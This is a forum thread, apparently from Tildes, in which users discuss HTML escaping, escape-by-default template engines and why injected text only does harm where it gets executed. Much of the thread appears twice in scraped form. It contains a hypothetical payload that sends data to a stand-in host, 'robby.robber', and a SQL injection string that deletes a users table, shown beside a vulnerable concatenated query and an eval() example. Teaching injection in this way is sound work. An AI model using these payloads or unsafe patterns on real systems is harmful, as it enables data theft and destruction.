Best practice is to only use HTML template systems that escape by default. Most mainstream languages have at least one. There are times when you don't want to escape something (because it's from a...
Best practice is to only use HTML template systems that escape by default. Most mainstream languages have at least one.
There are times when you don't want to escape something (because it's from a trusted source) and then it's best to have a static type to indicate that it's trusted. For example, Go has an HTML type.
Rails does a great job with this. They monkey-patch the String class in the context of controllers/views/etc. to set them as HTML unsafe by default. Every single string that gets interpolated into...
Rails does a great job with this. They monkey-patch the String class in the context of controllers/views/etc. to set them as HTML unsafe by default. Every single string that gets interpolated into a template will escape HTML unless you override that behavior with the #html_safe method.
It's a perfect solution because you don't need to know anything about it and you get the most secure behavior by default. If you really want to inline HTML you'll know right away that it's not working and only override in that one specific case.
What @Artemix means is that it's still just text. It can't possibly do anything harmful unless it's put in a context where it's treated as code. The only way that happens is if it gets run through...
What @Artemix means is that it's still just text. It can't possibly do anything harmful unless it's put in a context where it's treated as code.
The only way that happens is if it gets run through something like exec() (and why would you do that with a name?), or if it's output in a context where a browser can interpret it as Javascript (which is where you need to make sure to escape it before doing).
Unless I'm missing something, it's a snipper of text that escapes its containment (by "reclosing" with the additional quotation marks/tick) and adds arbitrary code.
Unless I'm missing something, it's a snipper of text that escapes its containment (by "reclosing" with the additional quotation marks/tick) and adds arbitrary code.
It still needs to be treated as code by something. It's not being escaped in the comment either, but it doesn't do anything because that's not a place where JavaScript gets executed.
It still needs to be treated as code by something. It's not being escaped in the comment either, but it doesn't do anything because that's not a place where JavaScript gets executed.
Am I losing my mind? It's gonna be treated as code by the JS variable you set when you accept the user-filled form, no? user fills the form → name gets set with var name = <user_input_here> → code...
Am I losing my mind? It's gonna be treated as code by the JS variable you set when you accept the user-filled form, no?
user fills the form → name gets set with var name = <user_input_here> → code extravaganza
Please forgive some philosophy. "Escaping" is something you do at an interface. It is a process of transforming data I have into another form that she wants ― of encoding. When a sequence of...
Exemplary
Please forgive some philosophy.
"Escaping" is something you do at an interface. It is a process of transforming data I have into another form that she wants ― of encoding.
When a sequence of characters stays within an environment (like your web browser) nothing special happens. Your web browser holds a mini document for every text field, which it updates when you type into it. The browser is able to do this because it conceives of strings in a very abstract sense.
When we write var addressee = givenName + " " + surname; we aren't really concerned about the quote characters in the middle. Instead we think abstractly about three separate strings: givenName and surname, which are already sequences of characters, and " ", which we have just summoned into the computer. Once they're all there, you and I can think about them however we want, but all the computer knows is "givenName is list of numbers, which are 69, 109, 105, 108, 121, representing a string".
The JavaScript engine stopped caring about quote characters right after it executed " ". Quote characters are just an incantation to conjure strings into your browser.
Similarly, a SQL engine running SELECT given_name from person WHERE surname = 'Murphy'; first transforms that command into an internal representation, then runs it.
At issue is the transformation from plain text into internal forms. Data at rest is perfectly safe.
If plain text is the interface from my web server to my database, then I have to produce plain text that conjures the right data into the database when the database program interprets that text.
As you have figured out, "injection" is when you make me emit plain text that she misunderstands.
But when you type into your JavaScript console, you interact with an extra interface! That's not an injection because that interface doesn't usually exist. If you write into a form field in your browser, that input materializes in memory without any escaping at all. It lives there and means nothing more than "a sequence of bytes" unless someone tries to run it ― to decode it.
So here's the question: what can you do to trick me into making bad text for her? The answer probably doesn't include executing JavaScript on your own computer, because you don't have to treat your own browser as a black box: you control it already. In other words, you're trying to trick yourself, not me.
Instead you have to somehow subvert my interface for her.
Damn. That's a nice overview, in human language. I appreciate that. I think my problem was that I misappreciated the value of a quotation mark for the code. I assumed it's meaningful on its own...
Damn. That's a nice overview, in human language. I appreciate that.
I think my problem was that I misappreciated the value of a quotation mark for the code. I assumed it's meaningful on its own (within the confines of, say, JS) because that's something I, as a web dev, have to converse in. This appears to not be the case, given that the browser is eager to store the " character as itself without breaking the compiler and its effort to keep the code sane.
"A sequence of bytes" makes more sense than "a string" in its interface sense.
Even though I'm employing a trick that's supposed to override this? It operates within the JS-scape as long as data gets committed, and if said data could even remotely interact with the code......
Even though I'm employing a trick that's supposed to override this? It operates within the JS-scape as long as data gets committed, and if said data could even remotely interact with the code...
I think your understanding of how there can be an exploit is just incomplete. The key thing is that some type of code needs to get injected into a context where it will be executed. I can inject...
I think your understanding of how there can be an exploit is just incomplete. The key thing is that some type of code needs to get injected into a context where it will be executed. I can inject javascript into this comment, but nothing will happen because it's not being executed:
alert("test");
That's perfectly valid javascript and it's not escaped or sanitized in any way, but it's not in a place where javascript code gets executed, so it doesn't do anything. It's just text that happens to also be code. That's why the more important part of a javascript injection onto a web site is finding a way to inject the <script> tag, because that's what causes the execution.
Here's how a "typical" SQL injection vulnerability happens:
query="select * from users where username = '"+name+"';"result=database.execute(query)
If someone has control of the name variable's value (because it comes from a web query variable or something similar) with code like that, they can set it to something like you showed, like:
'; delete from users; select '1
Now, when that value gets included in the query by the code above, the SQL that ends up getting executed is:
So the entire users table gets deleted. But again, the key point is that they injected SQL into a place that would be executed as SQL. If they had put some javascript into name instead, nothing would have happened, because it's being executed as SQL, not javascript.
So for something like you originally posted (John ˋ"'; ...) to work as an exploit, it has to go somewhere that it will eventually be executed as javascript. That would only happen in form-handling code if it was doing something crazy like this:
varnameValue=document.getElementById("name").value;varcode="var name = '"+nameValue+"';";eval(code);
But (hopefully) nobody would ever do that. They'd just do var name = nameValue; directly, and then nothing can happen, because it's not being executed, a variable is just being set to it. Again, the execution—which in this case is the eval() call—is the key factor. If the value doesn't eventually get used inside an eval(), there's no possible exploit.
No, because it glances over the idea of native escaping: that you could even turn something with a delimiter in it into a string and use it as such without seeing it escaped naturally. You're...
No, because it glances over the idea of native escaping: that you could even turn something with a delimiter in it into a string and use it as such without seeing it escaped naturally. You're saying "it won't do the thing because that's how you would do it", and nothing about why you'd have to do it this way.
I did some testing. The results are as follows. I tried to inject an entirely-new variable (here is the entire test base I used). What it ended up doing was perfectly encapsulating the string that I thought would easily escape: you can see that the " quotation mark is considered part of the string, even though the string is also using quotation marks to delimit strings. If it does that with any entered text, sure, you can't escape something the way I thought you could... but why?
The way I see it, it should work – and I think it probably does work with lower-level languages – but doesn't here.
You don't see escape characters. Try with console.log(JSON.stringify(name)); Edit: Actually, that just shows what the string would look like in code. See edit below for my thinking process.
You don't see escape characters. Try with console.log(JSON.stringify(name));
Edit: Actually, that just shows what the string would look like in code. See edit below for my thinking process.
Didn't follow the full conversation, but nice! Edit: Actually, you're both right. Instead, try this: var name = "var name = \"John\"; var rate = 100;"; console.log(name); console.log(rate); //...
Didn't follow the full conversation, but nice!
Edit: Actually, you're both right.
Instead, try this:
varname="var name = \"John\"; var rate = 100;";console.log(name);console.log(rate);// This will throw an error.eval(name);console.log(name);console.log(rate);// Now it has a value.
Without the eval, it's pretty hard to execute the code stored in a string. And strings from textboxes are auto escaped because otherwise they wouldn't be valid string types.
Edit2: Actually /u/Deimos is most likely right about the strings not being escaped. In the context of the source code, you need to escape for the parser to understand what's going on. Once the parser has gone over the string though, it doesn't need to hold on to the escape character \.
So really, to execute the string as code, you need the interpreter to evaluate the string.
I’m not a web programmer at all, and I just woke up, so I could be missing something, but does HTML escaping not exist? Literally all you have to do is replace a handful of characters with their...
I’m not a web programmer at all, and I just woke up, so I could be missing something, but does HTML escaping not exist? Literally all you have to do is replace a handful of characters with their &#xx equivalents and you’re good. I don’t think encoding matters here, as most things don’t interpret look-alikes.
That's the point of the article, and most languages and template engines do provide an escape mechanism. For example, in PHP, the htmlspecialchars() function does a great job for escaping.
That's the point of the article, and most languages and template engines do provide an escape mechanism.
For example, in PHP, the htmlspecialchars() function does a great job for escaping.
It's common, especially in newer HTML template languages. But there are many, many templating languages (because it's easy to write your own) and it's not the default in all of them. Especially in...
It's common, especially in newer HTML template languages. But there are many, many templating languages (because it's easy to write your own) and it's not the default in all of them. Especially in the early days of the web, it was common to use print statements or a template language that's not HTML-specific, and then the programmer has to remember to do the escaping every time they print something.
Best practice is to only use HTML template systems that escape by default. Most mainstream languages have at least one.
There are times when you don't want to escape something (because it's from a trusted source) and then it's best to have a static type to indicate that it's trusted. For example, Go has an HTML type.
Rails does a great job with this. They monkey-patch the
String
class in the context of controllers/views/etc. to set them as HTML unsafe by default. Every single string that gets interpolated into a template will escape HTML unless you override that behavior with the#html_safe
method.It's a perfect solution because you don't need to know anything about it and you get the most secure behavior by default. If you really want to inline HTML you'll know right away that it's not working and only override in that one specific case.
So, what happens if my name is
John ˋ"'; var maliciousSite = "http://robby.robber"; AJAX.send(data, maliciousWebsite)
and your input lacks sanitation?As input, this won't hurt, except if you do something shady like an
exec()
.As output, well, that's where you're supposed to escape.
How is "escaping unsanitized input to execute arbitrary code" not harmful?
What @Artemix means is that it's still just text. It can't possibly do anything harmful unless it's put in a context where it's treated as code.
The only way that happens is if it gets run through something like
exec()
(and why would you do that with a name?), or if it's output in a context where a browser can interpret it as Javascript (which is where you need to make sure to escape it before doing).Unless I'm missing something, it's a snipper of text that escapes its containment (by "reclosing" with the additional quotation marks/tick) and adds arbitrary code.
It still needs to be treated as code by something. It's not being escaped in the comment either, but it doesn't do anything because that's not a place where JavaScript gets executed.
Am I losing my mind? It's gonna be treated as code by the JS variable you set when you accept the user-filled form, no?
user fills the form → name gets set with
var name = <user_input_here>
→ code extravaganzaPlease forgive some philosophy.
"Escaping" is something you do at an interface. It is a process of transforming data I have into another form that she wants ― of encoding.
When a sequence of characters stays within an environment (like your web browser) nothing special happens. Your web browser holds a mini document for every text field, which it updates when you type into it. The browser is able to do this because it conceives of strings in a very abstract sense.
When we write
var addressee = givenName + " " + surname;
we aren't really concerned about the quote characters in the middle. Instead we think abstractly about three separate strings:givenName
andsurname
, which are already sequences of characters, and" "
, which we have just summoned into the computer. Once they're all there, you and I can think about them however we want, but all the computer knows is "givenName
is list of numbers, which are69, 109, 105, 108, 121
, representing a string".The JavaScript engine stopped caring about quote characters right after it executed
" "
. Quote characters are just an incantation to conjure strings into your browser.Similarly, a SQL engine running
SELECT given_name from person WHERE surname = 'Murphy';
first transforms that command into an internal representation, then runs it.At issue is the transformation from plain text into internal forms. Data at rest is perfectly safe.
If plain text is the interface from my web server to my database, then I have to produce plain text that conjures the right data into the database when the database program interprets that text.
As you have figured out, "injection" is when you make me emit plain text that she misunderstands.
But when you type into your JavaScript console, you interact with an extra interface! That's not an injection because that interface doesn't usually exist. If you write into a form field in your browser, that input materializes in memory without any escaping at all. It lives there and means nothing more than "a sequence of bytes" unless someone tries to run it ― to decode it.
So here's the question: what can you do to trick me into making bad text for her? The answer probably doesn't include executing JavaScript on your own computer, because you don't have to treat your own browser as a black box: you control it already. In other words, you're trying to trick yourself, not me.
Instead you have to somehow subvert my interface for her.
Damn. That's a nice overview, in human language. I appreciate that.
I think my problem was that I misappreciated the value of a quotation mark for the code. I assumed it's meaningful on its own (within the confines of, say, JS) because that's something I, as a web dev, have to converse in. This appears to not be the case, given that the browser is eager to store the
"
character as itself without breaking the compiler and its effort to keep the code sane."A sequence of bytes" makes more sense than "a string" in its interface sense.
<user_input_here>
would still be a string. Unless you tell your program to execute that string as code, it's gonna stay as a string.Even though I'm employing a trick that's supposed to override this? It operates within the JS-scape as long as data gets committed, and if said data could even remotely interact with the code...
...Imma test it out tomorrow.
I think your understanding of how there can be an exploit is just incomplete. The key thing is that some type of code needs to get injected into a context where it will be executed. I can inject javascript into this comment, but nothing will happen because it's not being executed:
alert("test");
That's perfectly valid javascript and it's not escaped or sanitized in any way, but it's not in a place where javascript code gets executed, so it doesn't do anything. It's just text that happens to also be code. That's why the more important part of a javascript injection onto a web site is finding a way to inject the
<script>
tag, because that's what causes the execution.Here's how a "typical" SQL injection vulnerability happens:
If someone has control of the
name
variable's value (because it comes from a web query variable or something similar) with code like that, they can set it to something like you showed, like:Now, when that value gets included in the query by the code above, the SQL that ends up getting executed is:
So the entire
users
table gets deleted. But again, the key point is that they injected SQL into a place that would be executed as SQL. If they had put some javascript intoname
instead, nothing would have happened, because it's being executed as SQL, not javascript.So for something like you originally posted (
John ˋ"'; ...
) to work as an exploit, it has to go somewhere that it will eventually be executed as javascript. That would only happen in form-handling code if it was doing something crazy like this:But (hopefully) nobody would ever do that. They'd just do
var name = nameValue;
directly, and then nothing can happen, because it's not being executed, a variable is just being set to it. Again, the execution—which in this case is theeval()
call—is the key factor. If the value doesn't eventually get used inside aneval()
, there's no possible exploit.Does that make sense?
No, because it glances over the idea of native escaping: that you could even turn something with a delimiter in it into a string and use it as such without seeing it escaped naturally. You're saying "it won't do the thing because that's how you would do it", and nothing about why you'd have to do it this way.
I did some testing. The results are as follows. I tried to inject an entirely-new variable (here is the entire test base I used). What it ended up doing was perfectly encapsulating the string that I thought would easily escape: you can see that the
"
quotation mark is considered part of the string, even though the string is also using quotation marks to delimit strings. If it does that with any entered text, sure, you can't escape something the way I thought you could... but why?The way I see it, it should work – and I think it probably does work with lower-level languages – but doesn't here.
You don't see escape characters. Try with
console.log(JSON.stringify(name));
Edit: Actually, that just shows what the string would look like in code. See edit below for my thinking process.
So there is escaping. I was fucking right all the time.
I feel like a goddamn prophet now, even though none of this shit really matters. :D
Didn't follow the full conversation, but nice!
Edit: Actually, you're both right.
Instead, try this:
Without the eval, it's pretty hard to execute the code stored in a string. And strings from textboxes are auto escaped because otherwise they wouldn't be valid string types.
Edit2: Actually /u/Deimos is most likely right about the strings not being escaped. In the context of the source code, you need to escape for the parser to understand what's going on. Once the parser has gone over the string though, it doesn't need to hold on to the escape character
\
.So really, to execute the string as code, you need the interpreter to evaluate the string.
I’m not a web programmer at all, and I just woke up, so I could be missing something, but does HTML escaping not exist? Literally all you have to do is replace a handful of characters with their &#xx equivalents and you’re good. I don’t think encoding matters here, as most things don’t interpret look-alikes.
That's the point of the article, and most languages and template engines do provide an escape mechanism.
For example, in PHP, the
htmlspecialchars()
function does a great job for escaping.It's common, especially in newer HTML template languages. But there are many, many templating languages (because it's easy to write your own) and it's not the default in all of them. Especially in the early days of the web, it was common to use print statements or a template language that's not HTML-specific, and then the programmer has to remember to do the escaping every time they print something.